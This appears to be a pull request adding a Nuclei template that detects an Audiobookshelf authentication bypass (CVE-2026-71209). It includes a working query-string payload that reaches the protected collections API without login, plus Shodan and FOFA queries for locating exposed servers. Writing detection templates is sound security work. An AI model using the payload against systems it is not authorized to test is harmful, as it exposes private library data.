### PR TITLE
Add CVE-2026-71209 Audiobookshelf collection authorization bypass

### DIFF
--- a/http/cves/2026/CVE-2026-71209.yaml
+++ b/http/cves/2026/CVE-2026-71209.yaml
@@ -1,0 +1,54 @@
+id: CVE-2026-71209
+
+info:
+  name: Audiobookshelf - Authentication Bypass via Unanchored Regex Exemption
+  author: str4k3r
+  severity: critical
+  description: |
+    Audiobookshelf's authentication-exemption check in server/Auth.js tests an
+    unanchored regex (/\/api\/items\/[^/]+\/cover/) against req.originalUrl,
+    which includes the query string. Appending a matching substring as any
+    query parameter value (e.g. ?r=/api/items/1/cover) to a normally
+    authenticated GET request satisfies the exemption check and lets the
+    request reach its handler without authentication, disclosing data such as
+    the library collections list on a completely default installation.
+  impact: |
+    Unauthenticated clients can reach protected API data, exposing library
+    metadata and potentially other resources behind the same exemption check.
+  remediation: |
+    Upgrade to a release that anchors and decodes authentication exemptions
+    before matching the request URL.
+  reference:
+    - https://github.com/advplyr/audiobookshelf
+    - https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-pg8v-5jcv-wrvw
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-71209
+    cwe-id: CWE-287
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: advplyr
+    product: audiobookshelf
+    shodan-query: title:"audiobookshelf"
+    fofa-query: title="audiobookshelf"
+  tags: cve,cve2026,audiobookshelf,authbypass,exposure
+
+http:
+  - raw:
+      - |
+        GET /api/collections HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /api/collections?r=/api/items/1/cover HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 401"
+          - "status_code_2 == 200"
+          - "contains(body_2, \"collections\")"
+        condition: and


### PR DESCRIPTION
## Vulnerability
Audiobookshelf’s authorization exemption regex can be satisfied by placing `r=/api/items/1/cover` in the query string. The request is then treated as an exempt cover-image route even when it targets the protected collections API.

## Template behavior
The template first requests `/api/collections` to establish the normal unauthorized response, then repeats the request with the crafted query substring and matches a 200 JSON collections response.

## Required configuration
The target must have authentication enabled and at least one library collection. No variables are required; the endpoint is read-only.

## Impact
An unauthenticated caller can enumerate library collections and metadata that should require authentication.

## Usage
```bash
nuclei -u <authorized-audiobookshelf> -t http/cves/2026/CVE-2026-71209.yaml
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
